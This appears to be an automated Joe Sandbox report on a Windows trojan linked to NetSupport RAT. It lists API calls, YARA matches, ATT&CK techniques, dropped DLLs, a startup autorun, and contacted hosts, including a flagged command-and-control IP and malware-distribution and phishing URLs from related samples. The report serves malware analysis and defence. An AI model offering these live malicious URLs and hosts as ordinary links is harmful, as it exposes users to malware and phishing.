Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,	11_2_6CEF888A
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,	11_2_6CEF8468
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,	11_2_6CEF65F0
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,	11_2_6CEF85AC
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,	11_2_6CEF871C

Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Code function: 3_2_110F37A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,

3_2_110F37A0

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

Code function: 0_2_0229F8E5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_0229F8E5

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Code function: 3_2_11147160 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetUserNameW,GetTickCount,GetTickCount,GetTickCount,FreeLibrary,

3_2_11147160

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Code function: 3_2_1117594C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

3_2_1117594C

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Code function: 3_2_11145C70 wsprintfA,GetVersionExA,RegOpenKeyExA,_memset,_strncpy,RegCloseKey,

3_2_11145C70

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,	3_2_11070430
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF62902 _errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_isleadbyte_l,RevokeBindStatusCallback,_errno,_errno,_invalid_parameter_noinfo,	3_2_6CF62902
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,	11_2_11070430

Source: Yara match	File source: 3.0.client32.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.client32.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.client32.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.client32.exe.70220000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.client32.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.client32.exe.70230000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.client32.exe.70220000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.client32.exe.70230000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.client32.exe.6e8b0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.hkpqXovZtS.exe.6728888.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000000.1370270714.0000000000652000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3711137674.000000006E8F0000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1372118588.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3709073509.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3698855636.0000000000652000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1371512576.0000000000652000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.1266608605.0000000000652000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3710467122.0000000005C50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1569570475.0000000005C50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hkpqXovZtS.exe PID: 6968, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 6276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SuportUpWin\pcicapi.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SuportUpWin\PCICHEK.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SuportUpWin\AudioCapture.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SuportUpWin\HTCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SuportUpWin\TCCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SuportUpWin\PCICL32.DLL, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	4 Native API	2 Valid Accounts	2 Valid Accounts	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Screen Capture	2 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Windows Service	21 Access Token Manipulation	4 Obfuscated Files or Information	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	1 Input Capture	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	2 Registry Run Keys / Startup Folder	1 Windows Service	2 Software Packing	NTDS	144 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	13 Process Injection	1 DLL Side-Loading	LSA Secrets	671 Security Software Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	1 Masquerading	Cached Domain Credentials	14 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	14 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	13 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
hkpqXovZtS.exe	53%	ReversingLabs	Win32.Trojan.Nekark
hkpqXovZtS.exe	100%	Avira	TR/AD.Nekark.wokwj
hkpqXovZtS.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\SuportUpWin\AudioCapture.dll	3%	ReversingLabs
C:\Users\user\AppData\Roaming\SuportUpWin\HTCTL32.DLL	13%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\SuportUpWin\PCICHEK.DLL	5%	ReversingLabs
C:\Users\user\AppData\Roaming\SuportUpWin\PCICL32.DLL	17%	ReversingLabs
C:\Users\user\AppData\Roaming\SuportUpWin\TCCTL32.DLL	6%	ReversingLabs
C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	30%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\SuportUpWin\msvcr100.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\SuportUpWin\pcicapi.dll	3%	ReversingLabs
C:\Users\user\AppData\Roaming\SuportUpWin\remcmdstub.exe	24%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label	Link
http://www.symauth.com/rpa00	0%	URL Reputation	safe
http://www.symauth.com/cps0(	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
geo.netsupportsoftware.com	104.26.0.231	true	false		unknown
pbkvithtosh07.com	51.89.111.5	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://geo.netsupportsoftware.com/location/loca.asp	false		unknown
http://51.89.111.5/fakeurl.htm	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.pci.co.uk/support	hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372118588.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	false		unknown
http://%s/testpage.htmwininet.dll	client32.exe, 00000003.00000002.3711137674.000000006E8F0000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.dr	false		unknown
http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)	hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	false		unknown
http://www.pci.co.uk/supportsupport	hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372118588.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	false		unknown
http://www.symauth.com/rpa00	hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr, PCICL32.DLL.0.dr, AudioCapture.dll.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	false	URL Reputation: safe	unknown
http://geo.netsupportsoftware.com/location/loca.e	client32.exe, 00000003.00000002.3710157110.0000000005AE5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://127.0.0.1RESUMEPRINTING	hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	false		unknown
http://www.netsupportschool.com/tutor-assistant.asp11(L	hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372118588.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	false		unknown
http://%s/testpage.htm	client32.exe, client32.exe, 00000003.00000002.3711137674.000000006E8F0000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.dr	false		unknown
http://geo.netsupportsoftware.com/location/loca.asps	client32.exe, 00000003.00000003.1324848844.0000000005AE5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://127.0.0.1	client32.exe, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	false		unknown
http://geo.netsupportsoftware.com/location/loca.aspj	client32.exe, 00000003.00000003.1324848844.0000000005AE5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710157110.0000000005AE5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.symauth.com/cps0(	hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr, PCICL32.DLL.0.dr, AudioCapture.dll.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	false	URL Reputation: safe	unknown
http://www.netsupportschool.com/tutor-assistant.asp	hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372118588.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	false		unknown
http://%s/fakeurl.htm	client32.exe, client32.exe, 00000003.00000002.3711137674.000000006E8F0000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.dr	false		unknown
http://geo.netsupportsoftware.com/	client32.exe, 00000003.00000003.1324848844.0000000005AE5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://geo.netsupportsoftware.com/location/loca.aspl	client32.exe, 00000003.00000003.1324775977.0000000005B04000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710157110.0000000005B04000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000003.1569692989.0000000005B04000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
51.89.111.5	pbkvithtosh07.com	France		16276	OVHFR	true
104.26.0.231	geo.netsupportsoftware.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1546938
Start date and time:	2024-11-01 18:10:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	hkpqXovZtS.exe renamed because original name is a hash value
Original Sample Name:	197c2d218121ff0ec738f5d301bf13b7824320c07942b99c9f278e8d7508b15d.exe
Detection:	MAL
Classification:	mal100.rans.troj.evad.winEXE@4/16@7/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 79% Number of executed functions: 177 Number of non-executed functions: 205
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: hkpqXovZtS.exe

Simulations

Behavior and APIs

Time	Type	Description
14:51:51	API Interceptor	13254612x Sleep call for process: client32.exe modified
18:11:06	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\autorunins.ini.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.0.231	file.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	qvoLvRpRbr.msi	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	EMX97rT0GX.msi	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	Support_auto.msi	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	information_package.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader, Stealc, Vidar	Browse	geo.netsupportsoftware.com/location/loca.asp
	updates.js	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	updates.js	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	updates.js	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
geo.netsupportsoftware.com	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	172.67.68.212
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	172.67.68.212
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	172.67.68.212
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	104.26.1.231
	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	104.26.1.231
	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	104.26.1.231
	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	172.67.68.212
	file.exe	Get hash	malicious	NetSupport RAT	Browse	172.67.68.212

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
OVHFR	z1ProductSampleRequirement.exe	Get hash	malicious	Remcos	Browse	51.75.166.98
	file.exe	Get hash	malicious	WhiteSnake Stealer	Browse	51.255.106.85
	https://send-space.s3.eu-north-1.amazonaws.com/de.html	Get hash	malicious	Unknown	Browse	51.91.79.17
	VkTNb6p288.exe	Get hash	malicious	FormBook	Browse	5.39.10.93
	12Jh49DCAj.exe	Get hash	malicious	Xmrig	Browse	54.37.232.103
	El9HaBFrFM.exe	Get hash	malicious	Blank Grabber	Browse	51.89.9.252
	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	54.37.62.77
	http://3d1.gmobb.jp/dcm299ccyag4e/gov/	Get hash	malicious	Phisher	Browse	178.32.210.226
	https://www.kwconnect.com/redirect?url=https%3A%2F%2Fwww.ingenieriawj.com/trx/#XdGFtYXJhLnBlcmVpcmFkZWplc3VzQGRhaWljaGktc2Fua3lvLmV1	Get hash	malicious	HTMLPhisher	Browse	149.56.200.84
	segura.vbs	Get hash	malicious	Remcos	Browse	164.132.58.105
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.97.3
	Setup.exe	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	https://issuu.com/mathildagr/docs/pmd9746827?fr=sZTMyNjc4NzAyNzM	Get hash	malicious	Unknown	Browse	104.17.24.14
	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
	https://myabd.co.uk/main/arull.php?7080797967704b53693230746450544d6f737a6b6a4e533076544b7972566438774a38394d4841413d3d#EMAILBASE64#	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://otcengine3.valr.live/signIn	Get hash	malicious	Unknown	Browse	104.17.24.14
	https://u47872954.ct.sendgrid.net/ls/click?upn=u001.fn1BsYIkFXRWxBLF12AvXhKUqktmOI7EPkchHYpa8lb2yJr9vm47Biq1iwhYH4x0W6E6_1tlZTUgFpToOJRvXeJjZ1lQQtiPaV281MW3UjMlmRxOXQrHf3E28Ct8cWw3pFJv8ww35QVlHVAsV9LrE8WJ-2FqWVvVFyUxLS7XbjE4ioBaNzI7Y9AQvglzmjEqljOvLuB-2FqyLAOnwfIZ8a2UOhb0kq4DsltFbCSVl8L5tTVcXPovhejZuw7J5gFYEuhvfLU6jp9IiI6bOp4vutoVple794Svog7VmNTHCQykEIajsBwvsIA9xBhrTaUhPe3riTZOj5RQVgP8LolzHF5ds6ImaI4Q1KNsmEF06CineSoPu7BKGd-2B4IINKzojAY3yUTkdWQLuCwDcmh7vK-2Fm4MQ0xAiPJ-2BNim16FZPVrX44e4DFM1rc1r1ZYN2APdeEIThalu0Ag-2BNzl5TCF9-2F-2B4cIgV-2B8ceF573hvcKOOmdD1jbxRbFryn-2FGT77SPyR6cNo7joqYajHU5-2F1gyPof24NnmOIwvhn7qKr0Ihz3SIWFLubPXV0GdcG6guT-2FBjwN6h83YPSF-2F5Pk0uzrf9DG4ZRnISsjJaazqmdBRAAsyoWwP5iXWDQEfiJXubX9fD-2BREtQifDIoI36c8qvCy5hrOP9aAfzd2djtg-2B8gR7MvgWYCa5sA7wAgdCKrrNRjX7eeAtG5StCtmRi-2BsSO4PCFgsA4QlR8AVRyhdPdKhSYzgA-2F1BCyYmRsFeWn4YzRn0mexGeZM3PwhHAdqlfom16LJGSiVeG98p5ZK5N-2BZQuMTlINorxwlmSmaGarY5x7TUyztB-2Bv8L8gRhXdcDKSzxiMknwYCjp3XaQdwr-2Fp8kePQSl33tJvX1ITAiP7FBhlwoPgNxbRoTwVzl0I2Q2bE71pQB2jeSQldBukVcgJT-2BrmpKQA1GW5-2B59frk-3D	Get hash	malicious	Unknown	Browse	172.66.40.133

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\SuportUpWin\AudioCapture.dll	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	upd_8707558.msix	Get hash	malicious	NetSupport RAT	Browse
	information_package.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader, Stealc, Vidar	Browse
	Update_2762895.msix	Get hash	malicious	NetSupport RAT	Browse
C:\Users\user\AppData\Roaming\SuportUpWin\HTCTL32.DLL	Update.js	Get hash	malicious	NetSupport RAT	Browse
	update.js	Get hash	malicious	NetSupport RAT	Browse
	Update.js	Get hash	malicious	NetSupport RAT	Browse
	update.js	Get hash	malicious	NetSupport RAT	Browse
	updates.js	Get hash	malicious	NetSupport RAT	Browse
	updates.js	Get hash	malicious	NetSupport RAT	Browse
	Update 124.0.6367.158.js	Get hash	malicious	NetSupport RAT	Browse
	updates.js	Get hash	malicious	NetSupport RAT	Browse
	Update 124.0.6367.158.js	Get hash	malicious	NetSupport RAT	Browse
	Update_124.0.6367.158.js	Get hash	malicious	NetSupport RAT	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\loca[1].htm

Download File

Process:	C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe
File Type:	ASCII text, with no line terminators
Category:	modified
Size (bytes):	15
Entropy (8bit):	2.7329145639793984
Encrypted:	false
SSDEEP:	3:QJgTG:QkG
MD5:	8AB0D91EF06123198FFAC30AD08A14C7
SHA1:	46D83BB84F74D8F28427314C6084CC9AFE9D1533
SHA-256:	DB50064FEE42FB57DCFD9C4269A682331246224D6108A18DB83ABD400CCECA12
